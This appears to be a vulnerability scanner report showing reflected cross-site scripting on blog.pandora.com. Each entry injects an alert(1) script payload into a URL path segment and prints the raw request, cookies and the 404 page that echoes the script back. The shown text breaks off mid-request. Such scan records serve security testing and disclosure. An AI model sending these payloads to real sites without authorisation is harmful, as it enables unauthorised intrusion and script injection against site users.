This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bf47<script>alert(1)</script>c247d05fe1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9839c<script>alert(1)</script>cc1f4677e63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d9b<script>alert(1)</script>1d7f2c0691b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 59e99<script>alert(1)</script>825e8cfc0de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe2be<script>alert(1)</script>1f3f48cf5b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ac1f<script>alert(1)</script>ef5a796adc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34032<script>alert(1)</script>06892156e4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6411d<script>alert(1)</script>c8b26e3f983 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1573<script>alert(1)</script>3b6a99d2827 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 172d5<script>alert(1)</script>d6b14e8dbb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ee2e<script>alert(1)</script>224981c07fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5184f<script>alert(1)</script>5f6e8db7f13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dff11<script>alert(1)</script>9e8c2c2eee5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b984<script>alert(1)</script>5934a17f05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abb6d<script>alert(1)</script>79106cb9952 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 465a8<script>alert(1)</script>77d6f7cf9b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8193f<script>alert(1)</script>fa1c0f6c054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fba06<script>alert(1)</script>415a42b75c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 189bf<script>alert(1)</script>7e15ac1b4e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
